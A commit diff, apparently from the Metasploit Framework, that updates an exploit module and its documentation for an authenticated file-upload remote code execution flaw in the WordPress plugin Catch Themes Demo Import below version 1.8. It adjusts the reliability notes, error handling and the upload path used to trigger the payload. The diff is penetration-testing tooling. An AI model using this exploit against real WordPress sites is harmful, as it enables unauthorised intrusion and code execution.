more wp catch themes doc and error handling

documentation/modules/exploit/multi/http/wp_catch_themes_demo_import.md

@@ -1,12 +1,14 @@
 ## Vulnerable Application
 
-The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to arbitrary file
-uploads via the import functionality found in the `~/inc/CatchThemesDemoImport.php` file,
-due to insufficient file type validation.
+The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated
+arbitrary file uploads via the import functionality found in the `~/inc/CatchThemesDemoImport.php`
+file, due to insufficient file type validation.
 
 Of note, the check functionality may not detect the version of `Catch Themes Demo Import` due
 to the readme file not containing the proper version number line.
 
+Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
+
 ## Verification Steps
 
 1. Install the plugin to wordpress

modules/exploits/multi/http/wp_catch_themes_demo_import.rb

@@ -17,9 +17,11 @@ def initialize(info = {})
         info,
         'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',
         'Description' => %q{
-          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to arbitrary file
-          uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file,
-          due to insufficient file type validation.
+          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated
+          arbitrary file uploads via the import functionality found in the
+          ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.
+          Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
+          During testing this timeout was roughly 5min.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -54,7 +56,9 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION ]
+          # https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770
+          # re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
+          'Reliability' => [ UNRELIABLE_SESSION ]
         }
       )
     )
@@ -73,7 +77,7 @@ def check
     if checkcode == CheckCode::Safe
       print_error('catch-themes-demo-import not a vulnerable version')
     end
-    return checkcode
+    checkcode
   end
 
   def exploit
@@ -123,7 +127,7 @@ def exploit
       'data' => multipart_form.to_s
     )
     fail_with(Failure::Unreachable, 'Site not responding') unless res
-
+    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
     fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
     # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
     # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
@@ -140,7 +144,7 @@ def exploit
     register_file_for_cleanup(random_filename)
     print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{Date.today.month}/#{random_filename}")
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, Date.today.month, random_filename),
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, Date.today.month.to_s.rjust(2, '0'), random_filename),
       'method' => 'GET',
       'keep_cookies' => 'true'
     )